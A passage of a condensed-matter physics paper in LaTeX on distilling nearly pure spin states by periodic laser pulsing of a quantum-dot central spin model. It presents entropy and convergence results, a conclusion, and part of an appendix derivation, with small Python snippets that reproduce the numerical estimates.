spectrum and the eigenoperators of $M$ is needed, see also Sect.\ \ref{sec:convergence}.
\section{Results on Entropy}
\label{sec:entropy}
It is known that in pulsed quantum dots
nuclear frequency focusing occurs (NFF) \cite{greil06a,greil07b,evers18}
which can be explained by a
significant change in the distribution of the Overhauser field
\cite{petro12,econo14,beuge16,beuge17,scher18,klein18} which is Gaussian
initially. This distribution
develops a comb structure with equidistant spikes. The difference $\Delta A_x$
between consecutive spikes is such that it corresponds to a full additional revolution
of the central spin, ${T_\mathrm{rep}} \Delta A_x=2\pi$. A comb-like
probability distribution is more structured and contains more information
than the initial featureless Gaussian. For instance, the entropy reduction
of the Overhauser field distributions computed
in Ref.\ \cite{klein18}, Fig.\ 12, relative to the initial Gaussians is
$\Delta S =-0.202k_\text{B}$ at $B=0.93$T and $\Delta S =-0.018k_\text{B}$ at $B=3.71$T.
Hence, NFF decreases the entropy, but only slightly for large spin
baths. This observation inspires us to
ask to what extent continued pulsing can reduce entropy
and which characteristics the final state has.
Inspired by the laser experiments on quantum dots \cite{greil06a,greil07b,evers18}
we choose an (arbitrary) energy unit $J_\text{Q}$ and thus $1/J_\text{Q}$, \red{recalling
that we have set $\hbar=1$},
as time unit which can be assumed to be of the order of 1ns. The repetition time
${T_\mathrm{rep}}$ is set to $4\pi/J_\text{Q}$ which is
on the one hand close to the experimental values where ${T_\mathrm{rep}}=13.2\text{ns}$ and
on the other hand makes it easy to recognize
resonances, see below. The trion decay rate is set to $2\gamma=2.5 J_\text{Q}$
to reflect a trion lifetime of $\approx 0.4\red{\text{ns}}$. The bath size is restricted
to $N\in\{1,2,\ldots,6\}$, but still allows us to draw fundamental conclusions
and to describe electronic spins coupled to hydrogen nuclear spins in small
molecules \cite{bunce87,blund07,ferra17,schna19}.
The individual couplings $J_i$ are chosen to be distributed according to
\begin{equation}
\label{eq:equidistant}
J_i = J_\text{max}(\sqrt{5}-2)\left(\sqrt{5}+2({i-1})/({N-1})\right),
\end{equation}
which is a uniform distribution between $J_\text{min}$ and $J_\text{max}$ with
$\sqrt{5}$ inserted to avoid accidental commensurabilities \red{of the
different couplings $J_i$}. \red{The value $J_\text{min}$
results from $J_i$ for $i=1$.
Other parametrizations are motivated by the shape of the electronic wave
functions \cite{merku02,schli03,coish04}.}
Results for a frequently used exponential parametrization \cite{farib13a}
\begin{equation}
\label{eq:expo}
J_i = J_\text{max}\exp(-\alpha(i-1)/(N-1))
\end{equation}
with $\alpha\in\{0.5, 1\}$ and for a Gaussian parametrization,
motivated by the electronic wave function in quantum dots \cite{coish04},
\begin{equation}
\label{eq:gaus}
J_i = J_\text{max}\exp(-\alpha[(i-1)/(N-1)]^2)
\end{equation}
are given in the next section and in Appendix \ref{app:other}.
\red{For both parametrizations the minimum value $J_\text{min}$ occurs for $i=N$
and takes the value $J_\text{min}=J_\text{max}\exp(-\alpha)$.}
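For concreteness, the three coupling parametrizations \eqref{eq:equidistant}, \eqref{eq:expo}, and \eqref{eq:gaus} can be tabulated in a few lines (a sketch; the function and argument names are our own):

```python
import numpy as np

def couplings(N, Jmax, kind="equidistant", alpha=1.0):
    """Couplings J_1,...,J_N for the three parametrizations used in the text."""
    i = np.arange(1, N + 1)
    if kind == "equidistant":   # uniform; sqrt(5) avoids accidental commensurabilities
        return Jmax * (np.sqrt(5) - 2) * (np.sqrt(5) + 2 * (i - 1) / (N - 1))
    if kind == "expo":          # exponential parametrization
        return Jmax * np.exp(-alpha * (i - 1) / (N - 1))
    if kind == "gaus":          # Gaussian parametrization
        return Jmax * np.exp(-alpha * ((i - 1) / (N - 1)) ** 2)
    raise ValueError(kind)

J = couplings(6, 0.02, "expo", alpha=1.0)
assert np.isclose(J[-1], 0.02 * np.exp(-1.0))    # J_min = Jmax*exp(-alpha) at i = N
Amax = 0.5 * couplings(6, 0.02).sum()            # maximum Overhauser field
```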
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig1a}
\includegraphics[width=0.59\columnwidth]{fig1b}
\caption{(a) Residual entropy of the limiting density matrix $V_0$ obtained after an
infinite number of pulses vs.\ the applied magnetic field for
$J_\text{max}=0.02J_\text{Q}$ and $z=1/1000$; 1 Tesla corresponds roughly to $50J_\text{Q}$.
Resonances of the electronic spin occur every
$\Delta h=0.5J_\text{Q}$; resonances of the nuclear spins occur every $\Delta h = 500J_\text{Q}$.
The blue dashed line depicts an offset of $\Delta h=\pm J_\text{max}/(2z)$ from the nuclear resonance.
(b) Zooms into intervals of the magnetic field where the lowest entropies
are reached. The blue dashed lines depict an offset of $\Delta h =\pm A_\text{max}$ from the
electronic resonance.}
\label{fig:overview}
\end{figure}
Figure \ref{fig:overview} displays a generic dependence on the external
magnetic field $h=g\mu_\text{B}B_x$ of the entropy of the limiting density
matrix $V_0$ obtained after an infinite number of pulses.
Two nested resonances of the Larmor precessions
are discernible: the central electronic spin resonates for
\begin{equation}
\label{eq:res-central}
h{T_\mathrm{rep}} = 2\pi n, \qquad n\in\mathbb{Z}
\end{equation}
\red{where $n$ is the number of Larmor revolutions that fit
into the interval ${T_\mathrm{rep}}$ between two pulses. This means that for an
increase of the magnetic field from $h$
to $h+\Delta h$ with $\Delta h=2\pi/{T_\mathrm{rep}}$ the
central spin is in the same state before the pulse as it was
at $h$.}
\red{The other resonance is related to the Larmor precession of
the nuclear bath spins
which leads to the condition
\begin{equation}
\label{eq:res-bath}
zh{T_\mathrm{rep}}=2\pi n', \qquad n'\in\mathbb{Z}
\end{equation}
where $n'$ indicates the number of Larmor revolutions of the nuclear spins
which fit between two pulses. Upon increasing the magnetic field $h$,
the nuclear spins are in the same state before the next pulse
if $h$ is changed to $h+\Delta h$ with $\Delta h=2\pi/(z{T_\mathrm{rep}})$.}
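With the parameters used here, ${T_\mathrm{rep}}=4\pi/J_\text{Q}$ and $z=10^{-3}$, the two resonance spacings quoted in the caption of Fig.\ \ref{fig:overview} follow directly; a quick numerical check:

```python
import numpy as np

JQ = 1.0                             # energy unit J_Q
Trep = 4 * np.pi / JQ                # repetition time
z = 1e-3                             # nuclear-to-electronic g-factor ratio

dh_electron = 2 * np.pi / Trep       # spacing of the central-spin resonances
dh_nuclear = 2 * np.pi / (z * Trep)  # spacing of the bath-spin resonances
assert np.isclose(dh_electron, 0.5)  # 0.5 J_Q between electronic resonances
assert np.isclose(dh_nuclear, 500.0) # 500 J_Q between nuclear resonances
```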
\red{But the two resonance conditions \eqref{eq:res-central} and \eqref{eq:res-bath}
for the central spin and for the bath spins apply precisely as given only without
coupling between the spins. The coupled system displays important shifts. The
nuclear resonance appears to be shifted by $z\Delta h \approx \pm J_\text{max}/2$,
see right panel of Fig.\ \ref{fig:overview}(a). The explanation is that the dynamics of
the central spin $S=1/2$ creates an additional magnetic field
\red{similar to a Knight shift} acting on each nuclear spin of the
order of $J_i/2$ which is estimated by $J_\text{max}/2$. Further support \red{of the
validity of this} explanation is given in Appendix \ref{app:shift}.}
The electronic resonance is shifted by
\begin{equation}
\label{eq:over-shift}
\Delta h = \pm A_\text{max}
\end{equation}
where $A_\text{max}$ is the \red{maximum possible value of the}
Overhauser field given by $A_\text{max}:=(1/2)\sum_{i=1}^N J_i$
for maximally polarized bath spins. This is shown in the right
panel of Fig.\ \ref{fig:overview}(b).
\red{Fig.\ \ref{fig:overview} shows that the effect of the
periodic driving on the
entropy strongly depends on the precise value of the magnetic field.
The entropy reduction is largest \emph{close} to the central resonance \eqref{eq:res-central}
and to the bath resonance \eqref{eq:res-bath}. This requires that both
resonances must be approximately commensurate. In addition, the \emph{precise} position of
the maximum entropy reduction depends on the two above shifts, the approximate Knight shift and
the shift by the maximum Overhauser field \eqref{eq:over-shift}.}
We pose the question to
what extent the initial entropy of complete disorder
$S_\text{init}=k_\text{B}(N+1)\ln2$ (in the figures and henceforth
$k_\text{B}$ is set to unity) can be reduced by commensurate
periodic pumping.
The results in Fig.\ \ref{fig:overview} clearly show that remarkably low
values of entropy can be reached. The residual value of $S\approx 0.5k_\text{B}$
in the minima of the right panel of Fig.\ \ref{fig:overview}(b) corresponds
to a contribution of less than two states ($S=k_\text{B}\ln2 \approx 0.7k_\text{B}$) while initially
16 states were mixed for $N=3$ so that the initial entropy is
$S_\text{init}=4k_\text{B}\ln2\approx2.77k_\text{B}$.
This represents a remarkable distillation of coherence.
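The entropy values quoted above follow from the von Neumann entropy of the density matrix; a minimal sketch (helper names are ours):

```python
import numpy as np

def von_neumann_entropy(rho):
    """S = -Tr(rho ln rho) in units of k_B."""
    p = np.linalg.eigvalsh(rho)
    p = p[p > 1e-15]                      # convention: 0*ln(0) = 0
    return float(-(p * np.log(p)).sum())

N = 3                                     # bath spins, plus one central spin
d = 2 ** (N + 1)                          # 16 states mixed initially
rho_init = np.eye(d) / d                  # completely disordered state
S_init = von_neumann_entropy(rho_init)
assert np.isclose(S_init, (N + 1) * np.log(2))   # 4 ln 2, about 2.77 k_B
```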
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig2}
\caption{(a) Residual entropy of the limiting density matrix $V_0$
for various bath sizes; other parameters as in Fig.\ \ref{fig:overview}.
The dashed lines indicate the shifts of the electronic
resonance by $-A_\text{max}$. (b) Corresponding normalized polarization of the spin bath
in the external field direction, i.e.\ the $x$-direction.}
\label{fig:size-mag}
\end{figure}
Hence, we focus on the minima and in particular on the
left minimum. We address the question whether the
distillation of coherence still works for larger systems.
Unfortunately,
the numerical analysis cannot be extended easily due to the
dramatically increasing dimension $D= 2^{2(N+1)}$ because
we are dealing with the Hilbert space of density matrices of the spin bath
and the central spin. Yet a
trend can be deduced from results up to $N=6$ displayed in
Fig.\ \ref{fig:size-mag}(a). The entropy reduction per $N+1$ spins is
$-0.58k_\text{B}$ for $N=3$, $-0.57k_\text{B}$ for $N=4$, $-0.55k_\text{B}$ for $N=5$,
and $-0.52k_\text{B}$ for $N=6$. The reduction is substantial, but
slowly decreases with system size. Presently, we cannot know the behavior for
$N\to\infty$. The finite value $\approx-0.2k_\text{B}$ found in the semiclassical
simulation \cite{scher18,klein18} indicates that the effect persists for
large baths. In Appendix \ref{app:other},
results for the couplings defined in \eqref{eq:expo} or in \eqref{eq:gaus}
are given which corroborate our finding. The couplings may be rather close to each
other, but not equal. It appears favorable that the spread of couplings
is not too large.
Which state is reached in the minimum
of the residual entropy? The decisive clue is provided by the lower panel
Fig.\ \ref{fig:size-mag}(b) displaying the polarization of the spin bath.
It is normalized such that its saturation value is unity.
Clearly, the minimum of the residual entropy coincides with the maximum
of the polarization. The latter is close to its saturation value, though
not quite, showing a minute decrease for increasing $N$. This tells us that
the limiting density matrix $V_0$ essentially corresponds to the polarized
spin bath. The central electronic spin is also almost perfectly polarized
(not shown), but in $z$-direction. These observations clarify the
state which can be retrieved by long trains of pulses.
Additionally, Fig.\ \ref{fig:size-mag}(b) explains the shift of the
electronic resonance. The polarized spin bath renormalizes the external
magnetic field by (almost) $\pm A_\text{max}$. To the left of the resonance, it enhances
the external field ($+A_\text{max}$) while the external field is effectively reduced
($-A_\text{max}$) to the right of the resonance. Note that an analogous direct explanation
for the shift of the nuclear resonance in the right panel of Fig.\
\ref{fig:overview} is not valid. The computed polarization of the
central spin points in $z$-direction and thus does not shift the external
field.
\section{Results on Convergence}
\label{sec:convergence}
In order to assess the speed of convergence of the initially disordered density
matrix $\rho_0=\mathbb{1}/Z$ to the limiting density matrix $V_0$ we
proceed as follows. Let us assume that the matrices $v_i$ are the
eigenmatrices of $M$ and that they are normalized, $||v_i||^2:=\text{Tr}(v_i^\dag v_i)=1$.
Since the mapping $M$ is not unitary, orthogonality of the eigenmatrices cannot
be assumed. Note that the standard normalization generically implies
that there is some factor between $V_0$ with $\text{Tr}(V_0)=1$ and $v_0$.
The initial density matrix $\rho_0$ can be expanded in the $\{v_i\}$
\begin{equation}
\rho_0 = \sum_{j=0}^{D-1} \alpha_j v_j.
\end{equation}
After $n$ pulses, the density matrix $\rho_n$ is given by
\begin{equation}
\rho_n = \sum_{j=0}^{D-1} \alpha_j \lambda_j^n v_j
\end{equation}
where $\lambda_j$ are the corresponding eigenvalues of $M$
and $\lambda_0=1$ by construction.
We aim at $\rho_n$ being close to $V_0$ within $p_\text{thresh}$, i.e.,
\begin{equation}
\label{eq:converged}
|| \rho_n -V_0 ||\le p_\text{thresh} ||V_0||
\end{equation}
should hold for an appropriate $n$. A generic value of the threshold
$p_\text{thresh}$ is $1\%$. To this end, the minimum $n$ which
fulfills \eqref{eq:converged} has to be estimated.
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig3}
\caption{Number of pulses for a convergence within $1\%$ ($p_\text{thresh}=0.01$)
is plotted for various bath sizes; couplings given by \eqref{eq:equidistant},
other parameters as in Fig.\ \ref{fig:overview}.
The corresponding residual entropies and magnetizations
are depicted in Fig.\ \ref{fig:size-mag}. The vertical dashed lines indicate
the estimates \eqref{eq:over-shift} for the entropy minima as before.}
\label{fig:number-N}
\end{figure}
Such an estimate can be obtained by determining
\begin{equation}
n_j := 1+\text{trunc}\left[\frac{\ln(|p_\text{thresh}\alpha_0/\alpha_j|)}{\ln(|\lambda_j|)}\right]
\end{equation}
for $j\in\{1, 2,3, \ldots,D-1 \}$. The estimate of the required number of
pulses is the maximum of these numbers, i.e.,
\begin{equation}
n_\text{puls} := \max_{1\le j < D} n_j.
\end{equation}
We checked in exemplary cases that the number determined in this way implies that
the convergence condition \eqref{eq:converged} is fulfilled.
This is not mathematically rigorous because it could be that there are very many
slowly decreasing contributions which add up to a significant deviation from
$V_0$. But generically, this is not the case.
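The estimate of $n_\text{puls}$ translates directly into code. The following sketch uses invented toy numbers; in the actual calculation the $\lambda_j$ and $\alpha_j$ come from the diagonalization of $M$:

```python
import numpy as np

def pulses_needed(lams, alphas, p_thresh=0.01):
    """Estimate the number of pulses n with ||rho_n - V0|| <= p_thresh ||V0||.
    lams[0] = 1 belongs to V0; alphas are the expansion coefficients of rho_0."""
    n_j = [1 + int(np.log(abs(p_thresh * alphas[0] / a)) / np.log(abs(l)))
           for l, a in zip(lams[1:], alphas[1:]) if abs(a) > 0]
    return max(n_j)

# a single slow mode with |lambda| close to 1 dominates the required pulse count
lams = [1.0, 1 - 1e-12, 0.5]
alphas = [1.0, 0.3, 0.3]
assert pulses_needed(lams, alphas) > 1e12     # of the order 10^12, as in Fig. 3
```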
In Fig.\ \ref{fig:number-N} the results are shown for various bath sizes
and the parameters for which the data of the previous figures was computed.
Since the entropy minima are located at the positions of the vertical dashed lines
to good accuracy one can read off the required number of pulses at the intersections
of the solid and the dashed lines. Clearly, about $2\cdot 10^{12}$ pulses are necessary
to approach the limiting, relatively pure density matrices $V_0$.
Interestingly, the number of required pulses does not depend
much on the bath size, at least for the accessible bath sizes.
This is a positive message in view of the scaling towards larger baths
in experimental setups.
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig4}
\caption{Number of pulses for a convergence within $1\%$ ($p_\text{thresh}=0.01$)
for $N=5$, $J_\text{max}=0.02J_\text{Q}$, and $z=10^{-3}$ for the exponential parametrization
in \eqref{eq:expo} (legend ``expo'') and the Gaussian parametrization
in \eqref{eq:gaus} (legend ``gaus'').
The corresponding residual entropies and magnetizations
are depicted in Figs.\ \ref{fig:expo} and \ref{fig:gaus}, respectively.
The vertical dashed lines indicate
the estimates for the entropy minima which are shifted from the
resonances without interactions according to \eqref{eq:over-shift}.}
\label{fig:parametrization}
\end{figure}
Figure \ref{fig:parametrization} depicts the required minimum number
of pulses for the two alternative parametrizations of the couplings
\eqref{eq:expo} and \eqref{eq:gaus}. Again, the range is about $3\cdot 10^{12}$.
Still, there are relevant differences. The value $n_\text{puls}$ is higher
for $\alpha=1$ ($\approx 4\cdot 10^{12}$) than for $\alpha=1/2$ ($\lessapprox 2\cdot 10^{12}$).
This indicates that the mechanism of distilling quantum states by
commensurability with periodic external pulses works best if the couplings \red{$J_i$
are similar, i.e., if the ratio $J_\text{min}/J_\text{max}=\exp(-\alpha)$ is close to unity}. The same qualitative result is obtained for the residual entropy,
see Appendix \ref{app:other}.
Note that this argument also explains why the Gaussian parametrized couplings \eqref{eq:gaus}
require slightly less pulses than the exponential parametrized couplings \eqref{eq:expo}.
\red{The couplings $J_i$ accumulate at their maximum $J_\text{max}$ in the Gaussian case so that their
variance is slightly smaller than that of the exponential parametrization.}
One could have thought that
the accumulated couplings $J_i \approx J_\text{max}$ in the Gaussian case
require longer pulsing in order to achieve a given degree of distillation
because mathematically equal couplings $J_i=J_{i'}$ imply degeneracies preventing
distillation, see the mathematical properties discussed in Sect.\ \ref{sec:math-proper}.
\red{But this appears not to be the case.}
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig5}
\caption{Residual entropies (panel a) and number of pulses
(panel b) for a convergence within $1\%$ ($p_\text{thresh}=0.01$)
for $N=3$, $J_\text{max}=0.1J_\text{Q}$, and $z=0.1$ for the equidistant parametrization
in \eqref{eq:equidistant} (legend ``equidist''), the exponential parametrization
in \eqref{eq:expo} (legend ``expo'') and the Gaussian parametrization
in \eqref{eq:gaus} (legend ``gaus'').
The vertical dashed lines indicate
the estimates for the entropy minima which are shifted from the
resonances without interactions according to \eqref{eq:over-shift}.}
\label{fig:faster}
\end{figure}
The total number of pulses is rather high. As many as $2\cdot 10^{12}$ pulses
for a repetition time ${T_\mathrm{rep}}\approx 10$ns imply about six hours of pulsing.
This can be achieved in the lab, but the risk that so far neglected decoherence
mechanisms spoil the process is real. If, however, the pulses can be applied more
frequently, for instance with ${T_\mathrm{rep}}=1$ns, the required duration shrinks to about 30
minutes. The question arises why so many pulses are required. While a comprehensive
study of this aspect is beyond the scope of the present article, a first clue
can be given.
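The quoted durations are simple arithmetic, $t = n_\text{puls}{T_\mathrm{rep}}$:

```python
n_puls = 2e12                          # pulses needed to approach V0
hours = n_puls * 10e-9 / 3600          # Trep of about 10 ns
assert 5.5 < hours < 5.6               # about six hours of pulsing
minutes = n_puls * 1e-9 / 60           # Trep = 1 ns
assert 33 < minutes < 34               # about half an hour
```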
A natural explanation is that the slow dynamics in the bath is responsible
for the large number of pulses required for convergence. This idea is corroborated
by the results displayed in Fig.\ \ref{fig:faster} where a larger
maximum coupling and, importantly, a larger $z$ factor is assumed.
Recall that the $z$-factor is the ratio of the Larmor frequency of the
bath spins to the Larmor frequency of the central spin. If it is increased,
here by a factor of 100, the bath spins precess much quicker.
Indeed, the range of the required number of pulses
is much lower, about $2\cdot 10^7$, which is five orders of magnitude less
than for the previous parameters. The former six hours then become fractions
of seconds. Of course, the conventional $g$-factors of nuclear and electronic
spins do not allow for $z=0.1$. But the central spin model as such, built by a central spin
and a bath of spins supplemented by a damped excitation can also be
realized in a different physical system.
\red{Alternatively, optimized pulses can improve the efficiency of the
distillation by periodic driving. One may either consider modulated pulses
of finite duration \cite{pasin08a} or repeated cycles of several instantaneous
pulses applied at optimized time instants \cite{uhrig07,uhrig07err}
or combinations of both schemes \cite{uhrig10a}. Thus, further research
is called for. The focus, however, of the present work
is to establish the fundamental mechanism built upon periodic driving, dissipation
and commensurability.}
\section{Conclusion}
\label{sec:conclusion}
Previous work has established dynamic nuclear polarization (DNP), for a
review see Ref.\ \cite{maly08}. But it must be stressed that
the mechanism of this conventional DNP is fundamentally different from
the one described here. Conventionally, the polarization of an electron
is transferred to the nuclear spins, i.e., the polarization of
the electrons induces polarization of the nuclei in the \emph{same} direction.
In contrast, in the setup studied here, the electron is polarized
in $z$-direction while the nuclear spins are eventually polarized
perpendicularly in $x$-direction. Hence, the mechanism is fundamentally different:
it is NFF stemming essentially from commensurability. This is
also the distinguishing feature compared to standard optical pumping.
States in the initial mixture which do not allow for a time
evolution commensurate with the repetition time ${T_\mathrm{rep}}$ of the pulses are
gradually suppressed \red{while those whose time evolution is
commensurate are enhanced. This means that the weight of the former
in the density matrix is reduced upon periodic application of the pulses while
the weight of the latter is enhanced. Note that the trace of the
density matrix is conserved so that the suppression of the weight of some states
implies that the weight of other states is increased. The effect of the pulses
on other norms of the density matrix is not obvious since the dynamics is
not unitary, but dissipative.}
\red{For particular magnetic fields, there may be only one particular state allowing
for a dynamics commensurate with ${T_\mathrm{rep}}$. This case leads to the maximum
entropy reduction. Such a}
mechanism can be used also for completely different physical systems,
e.g., in ensembles of oscillators. The studied case of coupled spins
extends the experimental and theoretical observations of NFF for large spin baths
\cite{greil06a,greil07b,petro12,econo14,beuge16,jasch17,scher18,klein18} where
many values of the polarization of the Overhauser
field can lead to commensurate dynamics. Hence, only a partial reduction of entropy
occurred.
The above established DNP by NFF comprises the potential
for a novel experimental technique for state preparation: laser pulses instead
of microwave pulses as in standard NMR can be employed to prepare
coherent states which can be used for further processing, either to
perform certain quantum protocols or for analysis of the systems under study.
The combination of optical and radio frequency pulsing appears promising
because it enlarges the possibilities of experimental manipulations.
Another interesting perspective is to employ the concept of
state distillation by commensurability to physical systems other than
localized spins, for instance to spin waves in quantum magnets.
First experimental observations of commensurability effects
for spin waves in ferromagnets have already been carried out \cite{jackl17}.
\red{Studies on how to enhance the efficiency of the mechanism by
optimization of the shape and distribution of the pulses constitute
an interesting route for further research.}
In summary, we showed that dissipative dynamics of a highly excited
state is sufficient to modify the dynamics of energetically low-lying
spin degrees of freedom away from unitarity. The resulting dynamic map
acts like a contraction converging towards
a single density matrix upon iterated application. The crucial additional
ingredient is \emph{commensurability} \red{between the external
periodic driving and the internal dynamic processes, for instance Larmor precessions.
If commensurability is possible a substantial entropy reduction
can be induced}, almost to a single pure state.
This has been explicitly shown for an exemplary small
central spin model including electronic and nuclear Zeeman effect.
This model served as proof-of-principle model to establish the
mechanism of distillation by commensurability.
Such a model describes the electronic spin in quantum dots with
diluted nuclear spin bath or the spin of unpaired electrons in
molecules, hyperfine coupled to nuclear hydrogen spins.
We stress that the mechanism of commensurability can also be put to use in
other systems with periodic internal processes.
The fascinating potential to create and to manipulate
coherent quantum states by such approaches deserves further
investigation.
\section*{Acknowledgements}
The author thanks A.\ Greilich, J.\ Schnack,
and O.~P.\ Sushkov for useful discussions and the School of Physics of the
University of New South Wales for its hospitality.
\paragraph{Funding information}
This work was supported by the Deutsche Forschungsgemeinschaft (DFG)
and the Russian Foundation of Basic Research in TRR 160,
by the DFG in project no.\ UH 90-13/1, and by the Heinrich-Hertz Foundation
of Northrhine-Westfalia.
\begin{appendix}
\section{Derivation of the Linear Mapping}
\label{app:matrix}
The goal is to solve the time evolution of $\rho(t)$ from
just before a pulse until just before the next pulse.
Since the pulse leads to a unitary time evolution which
is linear
\begin{equation}
\rho(n{T_\mathrm{rep}}-)\to\rho(n{T_\mathrm{rep}}+)=U_\text{puls}\rho(n{T_\mathrm{rep}}-)U_\text{puls}^\dag
\end{equation}
with $U_\text{puls}$ from (5),
and since the subsequent Lindblad dynamics defined by the
linear differential equation (6)
is linear as well, the total propagation in time is given by
a linear mapping $M: \rho(n{T_\mathrm{rep}}-) \rightarrow \rho((n+1){T_\mathrm{rep}}-)$.
This mapping is derived here
by an extension of the approach used in Ref.\ \cite{klein18}.
The total density matrix acts on the Hilbert space given by the direct product
of the Hilbert space of the
central spin comprising three states ($\ket{\uparrow},\ket{\downarrow}, \ket{\text{T}}$)
and the Hilbert space of the spin bath.
We focus on $\rho_\text{TT}:=\bra{\text{T}}\rho\ket{\text{T}}$
which is a $2^N\times2^N$ dimensional density matrix for the spin bath alone because the
central degree of freedom is traced out. By $\rho_\text{S}$
we denote the $d\times d$ dimensional
density matrix of the spin bath and the central spin, i.e., $d=2^{N+1}$ since
no trion is present: $\rho_\text{S}\ket{\text{T}}=0$. The number of entries
in the density matrix is $D=d^2$, i.e., the mapping we are looking for
can be represented by a $D\times D$ matrix.
The time interval ${T_\mathrm{rep}}$ between two consecutive pulses is sufficiently
long so that all excited trions have decayed before the next pulse arrives.
In numbers, this means $2\gamma{T_\mathrm{rep}}\gg 1$ and implies that
$\rho(n{T_\mathrm{rep}}-)=\rho_\text{S}(n{T_\mathrm{rep}}-)$ and hence inserting
the unitary of the pulse (5)
yields
\begin{subequations}
\label{eq:initial}
\begin{align}
\rho(n{T_\mathrm{rep}}+) &= U_\text{puls}\rho_\text{S}(n{T_\mathrm{rep}}-)U_\text{puls}^\dag
\\
\label{eq:initial-TT}
\rho_\text{TT}(n{T_\mathrm{rep}}+) &=\bra{\uparrow} \rho_\text{S}(n{T_\mathrm{rep}}-) \ket{\uparrow}
\\
\rho_\text{S}(n{T_\mathrm{rep}}+) &=\ket{\downarrow}\bra{\downarrow} \rho_\text{S}(n{T_\mathrm{rep}}-)
\ket{\downarrow}\bra{\downarrow} \ =\ S^-S^+ \rho_\text{S}(n{T_\mathrm{rep}}-) S^-S^+
\label{eq:initial-S}
\end{align}
\end{subequations}
where we used the standard ladder operators $S^\pm$ of the central spin to
express the projection $\ket{\downarrow}\bra{\downarrow}$.
The equations \eqref{eq:initial} set the initial values for the
subsequent Lindbladian dynamics which we derive next.
For completeness, we point out that there are also non-diagonal
contributions of the type $\bra{\text{T}}\rho\ket{\uparrow}$, but they
do not matter for $M$.
Inserting $\rho_\text{TT}$ into the Lindblad equation (6)
yields
\begin{equation}
\label{eq:TT}
\partial_t \rho_\text{TT}(t) = -i [H_\text{nZ},\rho_\text{TT}(t)] -2\gamma \rho_\text{TT}(t).
\end{equation}
No other parts contribute. The solution of \eqref{eq:TT} reads
\begin{equation}
\label{eq:TT_solution}
\rho_\text{TT}(t) = e^{-2\gamma t} e^{-iH_\text{nZ}t} \rho_\text{TT}(0+)
e^{iH_\text{nZ}t}.
\end{equation}
By the argument $0+$ we denote that the initial density matrix for
the Lindbladian dynamics is the one just after the pulse.
For $\rho_\text{S}$, the Lindblad equation (6)
implies
\begin{equation}
\partial_t \rho_\text{S}(t) = -i[H_\text{spin},\rho_\text{S}(t)]
+2\gamma \ket{\uparrow} \rho_\text{TT}(t) \bra{\uparrow}.
\end{equation}
Since we know the last term already from its solution in \eqref{eq:TT_solution}
we can treat it as a given inhomogeneity in the otherwise homogeneous
differential equation. With the definition $U_\text{S}(t):= \exp(-iH_\text{spin}t)$
we can write
\begin{equation}
\partial_t \left(U_\text{S}^\dag(t) \rho_\text{S}(t) U_\text{S}(t)
\right) = 2\gamma U_\text{S}^\dag(t) \ket{\uparrow}\rho_\text{TT}(t)\bra{\uparrow}
U_\text{S}(t).
\end{equation}
Integration leads to the explicit solution
\begin{equation}
\rho_\text{S}(t) = U_\text{S}(t) \rho_\text{S}(0+) U_\text{S}^\dag(t)
+2\gamma\int_0^t U_\text{S}^\dag(t-t') \ket{\uparrow}\rho_\text{TT}(t')\bra{\uparrow}
U_\text{S}(t-t')dt'.
\label{eq:S_solut}
\end{equation}
If we insert \eqref{eq:TT_solution} into the above equation
we encounter the expression
\begin{equation}
\ket{\uparrow} \exp(-iH_\text{nZ} t) = \exp(-iH_\text{nZ} t)\ket{\uparrow}
\ =\ \exp(-izh I^x_\text{tot} t) \exp(izh S^x t) \ket{\uparrow}
\end{equation}
where $I^x_\text{tot} :=S^x+\sum_{i=1}^NI^x_i$ is the total spin in $x$-direction.
It is a conserved quantity commuting with $H_\text{spin}$ so that a joint
eigenbasis with eigenvalues $m_\alpha$ and $E_\alpha$ exists. We determine
such a basis $\{\ket{\alpha}\}$ by diagonalization in the
$d$-dimensional Hilbert space ($d=2^{N+1}$) of central spin and spin bath
and convert \eqref{eq:S_solut} in terms
of the matrix elements of the involved operators. For brevity, we write
$\rho_{\alpha\beta}$ for the matrix elements of $\rho_\text{S}$.
\begin{align}
\rho_{\alpha\beta}(t) &= e^{-i(E_\alpha-E_\beta)t}\Big\{\rho_{\alpha\beta}(0+)
\nonumber \\
&+2\gamma \int_0^t e^{i(E_\alpha-E_\beta-zh(m_\alpha-m_\beta))t'}
\bra{\alpha} e^{izhS^xt'}\ket{\uparrow} \rho_\text{TT}(0+)
\bra{\uparrow} e^{izhS^xt'}\ket{\beta}dt'\Big\}.
\label{eq:matrix1}
\end{align}
Elementary quantum mechanics tells us that
\begin{equation}
\label{eq:spin-precess}
e^{izhS^xt'}\ket{\uparrow} =
\frac{1}{2}e^{ia}(\ket{\uparrow}+\ket{\downarrow})
+ \frac{1}{2}e^{-ia}(\ket{\uparrow}-\ket{\downarrow})
\end{equation}
with $a:=zht'/2$ which we need for the last row of equation \eqref{eq:matrix1}.
Replacing $\rho_\text{TT}(0+)$ by
$\bra{\uparrow} \rho_\text{S}(n{T_\mathrm{rep}}-) \ket{\uparrow}$ according to \eqref{eq:initial-TT}
and inserting \eqref{eq:spin-precess} we obtain
\begin{subequations}
\begin{align}
\bra{\alpha} e^{izhS^xt'}\ket{\uparrow} \rho_\text{TT}(0+)
\bra{\uparrow} e^{izhS^xt'}\ket{\beta}
& =\bra{\alpha} e^{izhS^xt'}\ket{\uparrow} \bra{\uparrow} \rho_\text{S}(0-) \ket{\uparrow}
\bra{\uparrow} e^{izhS^xt'}\ket{\beta}
\\
& = \frac{1}{2} \left( R^{(0)} + e^{izht'} R^{(1)} + e^{-izht'} R^{(-1)}
\right)_{\alpha\beta}
\label{eq:spin2}
\end{align}
\end{subequations}
with the three $d\times d$ matrices
\begin{subequations}
\begin{align}
R^{(0)} &:= S^+S^- \rho_\text{S}(0-) S^+S^- + S^- \rho_\text{S}(0-) S^+
\\
R^{(1)} &:= \frac{1}{2}(S^++\mathbb{1}_d)S^- \rho_\text{S}(0-) S^+(S^--\mathbb{1}_d)
\\
R^{(-1)} &:= \frac{1}{2}(S^+-\mathbb{1}_d)S^- \rho_\text{S}(0-) S^+(S^-+\mathbb{1}_d).
\end{align}
\end{subequations}
In this derivation, we expressed ket-bra combinations
by the spin ladder operators according to
\begin{equation}
\ket{\uparrow} \bra{\uparrow} = S^+S^- \qquad
\ket{\uparrow} \bra{\downarrow} = S^+ \qquad
